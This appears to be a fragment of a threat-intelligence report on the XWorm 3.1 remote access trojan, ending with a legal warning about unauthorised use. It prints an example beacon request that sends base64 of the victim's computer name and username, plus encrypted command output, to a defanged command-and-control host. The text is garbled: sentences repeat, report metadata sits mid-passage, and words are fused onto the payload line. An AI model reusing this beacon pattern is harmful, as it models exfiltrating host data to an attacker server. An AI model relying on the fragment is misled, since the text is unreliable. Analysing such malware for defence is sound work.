Most samples use HTTP or HTTPS for beaconing, but some variants support TCP raw sockets. The typical beacon interval is configurable (default: 10-30 seconds).
The HTTP POST request structure:
POST /index.php HTTP/1.1 Host: badc2[.]com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Content-Type: application/x-www-form-urlencoded
id=base64(ComputerName+Username)&data=AES_encrypted_command_outputxworm 3.1
Defending against this RAT requires a multi-layered strategy. Most samples use HTTP or HTTPS for beaconing,
Date: October 26, 2023 Classification: Public / TLP:WHITE Prepared by: Threat Intelligence Unit Defending against this RAT requires a multi-layered strategy
It is critical to note that distributing, possessing with intent to use, or deploying XWorm 3.1 against systems without explicit written authorization is a felony under the Computer Fraud and Abuse Act (CFAA) in the US and similar legislation globally (e.g., UK's Computer Misuse Act). Security researchers should only analyze XWorm 3.1 in controlled, isolated lab environments.
